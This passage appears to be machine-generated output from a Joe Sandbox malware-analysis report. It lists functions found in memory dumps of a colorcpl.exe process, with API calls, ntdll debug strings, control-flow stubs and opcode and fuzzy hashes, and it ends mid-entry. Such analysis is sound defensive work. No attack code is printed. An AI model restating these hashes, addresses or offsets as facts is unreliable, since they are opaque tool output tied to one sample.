                                                                                                                                          • Instruction Fuzzy Hash: C190023160970402D50071588554716101547D0201FA7C421A0424538D87958A5175A6
                                                                                                                                          Function 0661C6E3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 0 661c6e3-661c724 call 65f4423 call 661d5f3 RtlAllocateHeap
                                                                                                                                          APIs
                                                                                                                                          • RtlAllocateHeap.NTDLL(?,0660E2BE,?,?,00000000,?,0660E2BE,?,?,?), ref: 0661C71F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 065F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_65f0000_colorcpl.jbxd
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                          • Opcode ID: d77521647005bcff5bf8c74b6bcb6d11ea77122f9c6cfa393d7c4b621bdbae4c
                                                                                                                                          • Instruction ID: a7f5f64dd257389f374314ca2638395aa3025fee5eadbd02d1bab46b2b8e8457
                                                                                                                                          • Opcode Fuzzy Hash: d77521647005bcff5bf8c74b6bcb6d11ea77122f9c6cfa393d7c4b621bdbae4c
                                                                                                                                          • Instruction Fuzzy Hash: E1E06D72204304BBE650EE68DC44EDB37ACEFC9710F004409F918AB242C670B91187B4
                                                                                                                                          Function 0661C733 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 5 661c733-661c774 call 65f4423 call 661d5f3 RtlFreeHeap
                                                                                                                                          APIs
                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,56530845,00000007,00000000,00000004,00000000,06606D6D,000000F4), ref: 0661C76F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 065F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_65f0000_colorcpl.jbxd
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeHeap
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                          • Opcode ID: 8fdb64056d5ac56eb03050a3be1a750157d82889bd3d7b50d517048753f9b427
                                                                                                                                          • Instruction ID: 1908cce248603a0c39b353a8ddd54869ae10aad7cdf8a0fcbcf7b342753ff4cd
                                                                                                                                          • Opcode Fuzzy Hash: 8fdb64056d5ac56eb03050a3be1a750157d82889bd3d7b50d517048753f9b427
                                                                                                                                          • Instruction Fuzzy Hash: ECE06572204304BBDA90EF98DC40F9B77ACEFC9710F004409FA18AB242DB70B9118BB4
                                                                                                                                          Function 0661C783 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 15 661c783-661c7bf call 65f4423 call 661d5f3 ExitProcess
                                                                                                                                          APIs
                                                                                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,8970EBBF,?,?,8970EBBF), ref: 0661C7BA
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 065F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_65f0000_colorcpl.jbxd
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ExitProcess
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                          • Opcode ID: c424dda2dd0c29664fa9a855b2ebea30850c6aa388c004a8be5cc72625d4ab60
                                                                                                                                          • Instruction ID: 1d25ae1a947954d8e8c955ff2107d6ed417eb19fe02a991bd95771851d6de452
                                                                                                                                          • Opcode Fuzzy Hash: c424dda2dd0c29664fa9a855b2ebea30850c6aa388c004a8be5cc72625d4ab60
                                                                                                                                          • Instruction Fuzzy Hash: A9E086362102147BD660FF59DC01F9777ACEFC6711F004059FA18AB142C670BA1087F0
                                                                                                                                          Function 06603D8E Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 20 6603d8e-6603d9e PostThreadMessageW 21 6603da0-6603daa 20->21 22 6603dad-6603db3 20->22 21->22
                                                                                                                                          APIs
                                                                                                                                          • PostThreadMessageW.USER32(?,00000111), ref: 06603D9A
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 065F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_65f0000_colorcpl.jbxd
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                          • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                                          • Instruction ID: 9625f0a618ab2e51fe13e4d24e8301295917cd27be8ec0cfea172b09500661eb
                                                                                                                                          • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                                          • Instruction Fuzzy Hash: C0D0A967B4001C3AAA024584ACC1CFFB72CDB84AA6F004063FB08E2280E62189020AB0
                                                                                                                                          Function 22762C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 23 22762c0a-22762c0f 24 22762c11-22762c18 23->24 25 22762c1f-22762c26 LdrInitializeThunk 23->25
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: cf3133bd610033da4e467d1b9e8037f53a17084081e1926402155d01939931e0
                                                                                                                                          • Instruction ID: ba280a071d7a48286205cd7347e95588509752b5fff3ffe0147f1175cdb9df45
                                                                                                                                          • Opcode Fuzzy Hash: cf3133bd610033da4e467d1b9e8037f53a17084081e1926402155d01939931e0
                                                                                                                                          • Instruction Fuzzy Hash: C6B09B719067C5C9DB41E7604B0C727791167D0701F57C071D6030651F4778C1D1F175

                                                                                                                                          Non-executed Functions

                                                                                                                                          Function 227A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 0-2160512332
                                                                                                                                          • Opcode ID: f8ab8229cd7f26573ab0d6ec75ea2f86b88b57d7a38eaa12e3b8e77ddd291fea
                                                                                                                                          • Instruction ID: 187c64da1b184986a34ecebf9aecb59a6392a4ae3093fb36726c7dc4fccb4fd6
                                                                                                                                          • Opcode Fuzzy Hash: f8ab8229cd7f26573ab0d6ec75ea2f86b88b57d7a38eaa12e3b8e77ddd291fea
                                                                                                                                          • Instruction Fuzzy Hash: C2928D7160C341ABE321CF24C994F5BB7E8BB94764F104A2DFA94DB291D7B0E944CB92
                                                                                                                                          Function 22758620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • Invalid debug info address of this critical section, xrefs: 227954B6
                                                                                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 22795543
                                                                                                                                          • undeleted critical section in freed memory, xrefs: 2279542B
                                                                                                                                          • Address of the debug info found in the active list., xrefs: 227954AE, 227954FA
                                                                                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 227954CE
                                                                                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 2279540A, 22795496, 22795519
                                                                                                                                          • 8, xrefs: 227952E3
                                                                                                                                          • double initialized or corrupted critical section, xrefs: 22795508
                                                                                                                                          • corrupted critical section, xrefs: 227954C2
                                                                                                                                          • Critical section address., xrefs: 22795502
                                                                                                                                          • Thread identifier, xrefs: 2279553A
                                                                                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 227954E2
                                                                                                                                          • Critical section address, xrefs: 22795425, 227954BC, 22795534
                                                                                                                                          • Critical section debug info address, xrefs: 2279541F, 2279552E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                          • API String ID: 0-2368682639
                                                                                                                                          • Opcode ID: cc850b4c227620932708cee7feb744b6834e63d6475152f649426af367bbae96
                                                                                                                                          • Instruction ID: b7e4b2c34f09ee4f5b10305314d1faad1fed306ca5c734678c8fd05a8bf6f995
                                                                                                                                          • Opcode Fuzzy Hash: cc850b4c227620932708cee7feb744b6834e63d6475152f649426af367bbae96
                                                                                                                                          • Instruction Fuzzy Hash: 23817BB1A08368EFEB10CF95C984FAEBBF5EB48314F504119F908B7281D375AA45CB60
                                                                                                                                          Function 227529F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 22792506
                                                                                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 2279261F
                                                                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 227925EB
                                                                                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 227922E4
                                                                                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 22792412
                                                                                                                                          • @, xrefs: 2279259B
                                                                                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 22792602
                                                                                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 22792409
                                                                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 22792624
                                                                                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 22792498
                                                                                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 227924C0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                          • API String ID: 0-4009184096
                                                                                                                                          • Opcode ID: 79b0300b765d11fc40525ac16e207890a3d882d83bdd709fd98721ea2d280d39
                                                                                                                                          • Instruction ID: 419c1c0929d32d1c364b6460f1f048808450d9138dcb5d16b384289274cc72f3
                                                                                                                                          • Opcode Fuzzy Hash: 79b0300b765d11fc40525ac16e207890a3d882d83bdd709fd98721ea2d280d39
                                                                                                                                          • Instruction Fuzzy Hash: 3C0263B1D093289BDB21DB14CD84BDAB7B8AF65304F4041D9AA0CB7252EB709F94CF59
                                                                                                                                          Function 227C8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                          • API String ID: 0-2515994595
                                                                                                                                          • Opcode ID: 3cc649d7e9e0e856e21c799b879d506c7228497e614e93e13a29d6c80e83ab88
                                                                                                                                          • Instruction ID: b16181276b63a697e597e3166153bd9a1e4d4adfe56d8ee89fe78dfacc6f277e
                                                                                                                                          • Opcode Fuzzy Hash: 3cc649d7e9e0e856e21c799b879d506c7228497e614e93e13a29d6c80e83ab88
                                                                                                                                          • Instruction Fuzzy Hash: 4B51C27151E3019BC726CF29CA84BABB7E8EF98354F904A6DE959C3241E730D604C792
                                                                                                                                          Function 227D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                          • API String ID: 0-1700792311
                                                                                                                                          • Opcode ID: b18031df3ec71265fd17fad6de30d820989f3e54a510c80d0018150854519b8e
                                                                                                                                          • Instruction ID: 13c35c3cf8435be94d585905c42c3c8b3715284106a3d8ff691b1f8d138d197f
                                                                                                                                          • Opcode Fuzzy Hash: b18031df3ec71265fd17fad6de30d820989f3e54a510c80d0018150854519b8e
                                                                                                                                          • Instruction Fuzzy Hash: 99D10136608785DFCB12CF68C584BADBBF1FF5A314F049559E846AB292C734E981CB10
                                                                                                                                          Function 2272EA80 Relevance: 9.8, Strings: 7, Instructions: 1073COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T$`Vo"${
                                                                                                                                          • API String ID: 0-2118173349
                                                                                                                                          • Opcode ID: a44b412c5cedb23e055db34cf7056e5e1bff2f6d8df37df26af0feb2d3aa5c74
                                                                                                                                          • Instruction ID: 754af4a8acf12b2579a0fc4c46d250249f22bb7b0831d61f8ba5ad52271417a7
                                                                                                                                          • Opcode Fuzzy Hash: a44b412c5cedb23e055db34cf7056e5e1bff2f6d8df37df26af0feb2d3aa5c74
                                                                                                                                          • Instruction Fuzzy Hash: 24A24874A09B6A8FDB64CF19CD98B9AB7B1BF45304F5042E9D90CA7250DB709E81CF41
                                                                                                                                          Function 227A89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 227A8A3D
                                                                                                                                          • HandleTraces, xrefs: 227A8C8F
                                                                                                                                          • VerifierFlags, xrefs: 227A8C50
                                                                                                                                          • VerifierDebug, xrefs: 227A8CA5
                                                                                                                                          • AVRF: -*- final list of providers -*- , xrefs: 227A8B8F
                                                                                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 227A8A67
                                                                                                                                          • VerifierDlls, xrefs: 227A8CBD
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                          • API String ID: 0-3223716464
                                                                                                                                          • Opcode ID: 9305fa0611d8dce55121e8bc363b218fbea09532eda08e1b0c5855c93dc5a83e
                                                                                                                                          • Instruction ID: 6a4980adf9399c918c2f2c065a0d2dc546b047cbb9ee3420d6ddfde623693998
                                                                                                                                          • Opcode Fuzzy Hash: 9305fa0611d8dce55121e8bc363b218fbea09532eda08e1b0c5855c93dc5a83e
                                                                                                                                          • Instruction Fuzzy Hash: 8891F27264E311EBD312CF68C9A0B0A77E4AF54724F810A68FA56AB2D1C738D904CBD5
                                                                                                                                          Function 227563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 0-792281065
                                                                                                                                          • Opcode ID: aafa3e1ed603ed5b63c67a6c054304466e731cbf07c3d494e83894d8c4e91a36
                                                                                                                                          • Instruction ID: 3d71d43a3204016f7220996816e2f8d23c45e871cead430647a89a68f1c8268d
                                                                                                                                          • Opcode Fuzzy Hash: aafa3e1ed603ed5b63c67a6c054304466e731cbf07c3d494e83894d8c4e91a36
                                                                                                                                          • Instruction Fuzzy Hash: A3915731A4D3119BEB16CF50E998BAA7BE0FF51728F100638EE017B2C9D7789901CB91
                                                                                                                                          Function 22752674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • RtlGetAssemblyStorageRoot, xrefs: 22792160, 2279219A, 227921BA
                                                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 227921BF
                                                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 22792178
                                                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 22792180
                                                                                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 2279219F
                                                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 22792165
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                          • API String ID: 0-861424205
                                                                                                                                          • Opcode ID: 13a504dd8d9511ab085594b939d414581d1d627333c4b31c7da3421ca2256c58
                                                                                                                                          • Instruction ID: 4910889b6bb6bcc1a9875b45ea87acd5e6fea352f396ac0636688daa0ab042bc
                                                                                                                                          • Opcode Fuzzy Hash: 13a504dd8d9511ab085594b939d414581d1d627333c4b31c7da3421ca2256c58
                                                                                                                                          • Instruction Fuzzy Hash: B8310332F483157BF711DA959C84F9BBBB8DB75B94F010159BB08BB284D6B09E10CBA1
                                                                                                                                          Function 2275C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 227981E5
                                                                                                                                          • LdrpInitializeProcess, xrefs: 2275C6C4
                                                                                                                                          • LdrpInitializeImportRedirection, xrefs: 22798177, 227981EB
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 2275C6C3
                                                                                                                                          • Loading import redirection DLL: '%wZ', xrefs: 22798170
                                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 22798181, 227981F5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                          • API String ID: 0-475462383
                                                                                                                                          • Opcode ID: dd2599263a23931b002c3c8fe03923de821628dc2f6dd4fc1beab2b6c5eecf0a
                                                                                                                                          • Instruction ID: 5463ce8bf0fd22019ebc2223fa99b5b6e280fc4e55c4a28bcb593512342f914c
                                                                                                                                          • Opcode Fuzzy Hash: dd2599263a23931b002c3c8fe03923de821628dc2f6dd4fc1beab2b6c5eecf0a
                                                                                                                                          • Instruction Fuzzy Hash: E531C07274C345AFD311DF28D989E2AB7E4EF94714F000968FD45AB2D5EA20DD04C7A2
                                                                                                                                          Function 2276096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 22762DF0: LdrInitializeThunk.NTDLL ref: 22762DFA
                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22760BA3
                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22760BB6
                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22760D60
                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22760D74
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1404860816-0
                                                                                                                                          • Opcode ID: 97869dc4f2c5191d04100a2cec58cff32d6c847bbd69cbe33318de9c41b8ec83
                                                                                                                                          • Instruction ID: 9a40d58b767c8623dc6aa15cd34bffb40bd35e9ff2292a80ca0e4c7e071a9f55
                                                                                                                                          • Opcode Fuzzy Hash: 97869dc4f2c5191d04100a2cec58cff32d6c847bbd69cbe33318de9c41b8ec83
                                                                                                                                          • Instruction Fuzzy Hash: 3D427B71904715DFEB21CF64C984BAAB7F5FF44314F0445AAE989EB241E770AA84CF60
                                                                                                                                          Function 227204E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • RtlGetReturnAddressHijackTarget.NTDLL ref: 22720564
                                                                                                                                          Strings
                                                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2272063D
                                                                                                                                          • kLsE, xrefs: 22720540
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressHijackReturnTarget
                                                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                          • API String ID: 806345674-2547482624
                                                                                                                                          • Opcode ID: 63a1afb6cd6485cdf73e5d273ced1c47e56ea71933cab5c4440f2e013925d7b6
                                                                                                                                          • Instruction ID: 4ed81f9669cd86e25dea2e49eb612e99deb7af8b0d30c8c8c6bbb938e8a6f64e
                                                                                                                                          • Opcode Fuzzy Hash: 63a1afb6cd6485cdf73e5d273ced1c47e56ea71933cab5c4440f2e013925d7b6
                                                                                                                                          • Instruction Fuzzy Hash: 1951C171508B528FC314DF25C644B97B7E8AF94304F004A3EEAAA87245E734D645CFA2
                                                                                                                                          Function 2272A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
